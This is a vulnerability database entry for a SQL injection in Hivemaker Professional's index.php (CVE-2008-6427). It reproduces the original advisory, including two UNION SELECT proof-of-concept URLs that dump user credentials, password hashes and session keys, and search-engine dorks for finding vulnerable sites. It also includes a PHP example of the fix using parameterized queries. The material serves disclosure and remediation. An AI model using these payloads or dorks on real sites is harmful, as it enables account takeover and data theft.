Hivemaker Professional 'index.php' SQL Injection Vulnerability

Vulnerability ID: 1115308    Vulnerability type: SQL injection
Published: 2008-05-30    Updated: 2008-05-30
CVE: CVE-2008-6427    CNNVD ID: CNNVD-200903-136
Platform: PHP    CVSS score: 6.8
|Vulnerability sources
https://www.exploit-db.com/exploits/5698
https://www.securityfocus.com/bid/29442
https://cxsecurity.com/issue/WLB-2009030150
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200903-136
|Vulnerability details
Hivemaker is a web site construction system written in PHP. An SQL injection vulnerability exists in index.php of Hivemaker Professional 1.0.2 and earlier versions: when magic_quotes_gpc is disabled, a remote attacker can execute arbitrary SQL commands via the cid parameter.
|Vulnerability exploit
____________________   ___ ___ ________
\_   _____/\_   ___ \ /   |   \\_____  \  
 |    __)_ /    \  \//    ~    \/   |   \ 
 |        \\     \___\    Y    /    |    \
/_______  / \______  /\___|_  /\_______  /
        \/         \/       \/         \/ 

                                        .OR.ID
ECHO_ADV_96$2008

-----------------------------------------------------------------------------------------
[ECHO_ADV_96$2008] HiveMaker Professional <= 1.0.2 (cid) Sql Injection Vulnerability
-----------------------------------------------------------------------------------------

Author         : M.Hasran Addahroni
Date           : May, 30 th 2008
Location       : Jakarta, Indonesia
Web            : http://e-rdc.org/v1/news.php?readmore=91
Critical Lvl   : Medium
Impact         : System access
Where          : From Remote
---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application   : HiveMaker Professional
version       : <= 1.0.2
Vendor        : http://www.hivemaker.com
Description   :

Hivemaker is a website creation system written in PHP. Users can create websites without knowing any HTML, in a fashion similar to GeoCities. Users can select modules and VERY easily create contact forms, web counters and a variety of other content! Included is a website directory that allows all your users' websites to be viewable by the general public.
For administrators, Hivemaker is easily upgradeable. Modules and templates can be installed as simply as uploading the new template. The content is then immediately ready to be used by your users. Full user administration functions are available, as well as the ability to add banners to every user's website.
---------------------------------------------------------------------------

Vulnerability:
~~~~~~~~~~~~~

Input passed to the "cid" parameter of the index.php page is not properly verified before being used in an SQL query.
This can be exploited through the browser to retrieve users' MD5 password hashes and also their session IDs.
Successful exploitation requires that "magic_quotes" is off.


Poc/Exploit:
~~~~~~~~~

http://www.target.com/[path]/sites/index.php?cid=-1%20union%20select%201,2,3,concat(uid,0x3a,username,0x3a,useremail,0x3a,userpass,0x3a,aid,0x3a,password_reminder,0x3a,confirmation_code),5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5%20from%20userinfo--

http://www.target.com/[path]/sites/index.php?cid=-1%20union%20select%201,2,3,sesskey,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5%20from%20sessions--


Dork:
~~~~
Google    : "Hivemaker" or "Hivemaker(TM) Control Panel Login"
Altavista : "Hivemaker(TM) Control Panel Login"


Solution:
~~~~~~

- Edit the source code to ensure that input is properly verified.
- Turn on magic_quotes in php.ini
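As an added illustration of the first fix the advisory calls for (this is not Hivemaker's own source, which the advisory does not reproduce), the unsafe pattern described in the Vulnerability section beside a hardened handler for the same "cid" parameter; the table and column names are assumed:

```php
<?php
// Added illustration, not Hivemaker code: the "sites" table and "cid" column
// are assumed names standing in for whatever index.php actually queries.

// BEFORE (assumed vulnerable pattern): the raw GET value is spliced into the
// SQL text, so "cid=-1 union select ..." becomes part of the statement.
function build_query_unsafe(string $cid): string
{
    return "SELECT * FROM sites WHERE cid = " . $cid;
}

// Strict validation: "cid" must be a base-10 integer >= 1. Anything else
// (a trailing "union select", quotes, NUL bytes) is rejected before any SQL runs.
function validate_cid(mixed $raw): ?int
{
    if (!is_string($raw)) {
        return null;
    }
    $opts = ['options' => ['min_range' => 1, 'max_range' => PHP_INT_MAX]];
    $cid = filter_var($raw, FILTER_VALIDATE_INT, $opts);
    return $cid === false ? null : $cid;
}

// AFTER: bound parameter via PDO. The value never becomes part of the SQL
// text, so the fix does not depend on the magic_quotes setting at all.
function fetch_site(PDO $db, mixed $raw): ?array
{
    $cid = validate_cid($raw);
    if ($cid === null) {
        http_response_code(400);
        // Log the rejection (truncated) so probes show up in monitoring.
        $shown = is_string($raw) ? substr($raw, 0, 80) : gettype($raw);
        error_log('index.php: rejected cid=' . $shown);
        return null;
    }
    $stmt = $db->prepare('SELECT * FROM sites WHERE cid = :cid');
    $stmt->bindValue(':cid', $cid, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Usage in the page handler: fetch_site($db, $_GET['cid'] ?? null);
```

validate_cid() returns null for inputs such as "-1 union select 1,2,3" or "1'", and the bound PDO::PARAM_INT parameter means even a passing value is transmitted as data rather than SQL.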
 

Timeline:
~~~~~~~~

- 24 - 05 - 2008 bug found
- 25 - 05 - 2008 vendor contacted
- 30 - 05 - 2008 advisory released
---------------------------------------------------------------------------

Shoutz:
~~~~
~ ping - my dearest wife, zautha my little angel, for all the luv the tears n the breath
~ y3dips,the_day,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,pushm0v,az01,negative,the_hydra,neng chika, str0ke
~ everybody [at] SCAN-NUSANTARA and SCAN-ASSOSIATES
~ masterpop3,maSter-oP,Lieur-Euy,Mr_ny3m,bithedz,murp,sakitjiwa,x16,an0maly,cybertank,super_temon,b120t0,inggar,fachri,adi,rahmat,indra,cyb3rh3b
~ dr188le,SinChan,h4ntu,cow_1seng,poniman_coy,paman_gembul,ketut,rizal,cR4SH3R,kuntua,stev_manado,nofry,k1tk4t,0pt1c
~ newbie_hacker@yahoogroups.com
~ #aikmel #e-c-h-o @irc.dal.net

---------------------------------------------------------------------------
Contact:
~~~~~

     K-159 || echo|staff || eufrato[at]gmail[dot]com
     Homepage: http://www.e-rdc.org/

-------------------------------- [ EOF ] ----------------------------------

# milw0rm.com [2008-05-30]
|Affected products
Scriptfactory New Media Hivemaker Professional 1.0.2
|References

Source: XF
Name: hivemaker-index-sql-injection(42751)
Link: http://xforce.iss.net/xforce/xfdb/42751
Source: VUPEN
Name: ADV-2008-1923
Link: http://www.vupen.com/english/advisories/2008/1923/references
Source: BUGTRAQ
Name: 20080601 [ECHO_ADV_96$2008] HiveMaker Professional <= 1.0.2 (cid) Sql Injection Vulnerability
Link: http://www.securityfocus.com/archive/1/archive/1/492917/100/0/threaded
Source: MILW0RM
Name: 5928
Link: http://www.milw0rm.com/exploits/5928
Source: MILW0RM
Name: 5698
Link: http://www.milw0rm.com/exploits/5698
Source: SECUNIA
Name: 30465
Link: http://secunia.com/advisories/30465
Source: OSVDB
Name: 45916
Link: http://osvdb.org/45916
Source: MISC
Link: http://e-rdc.org/v1/news.php?readmore=91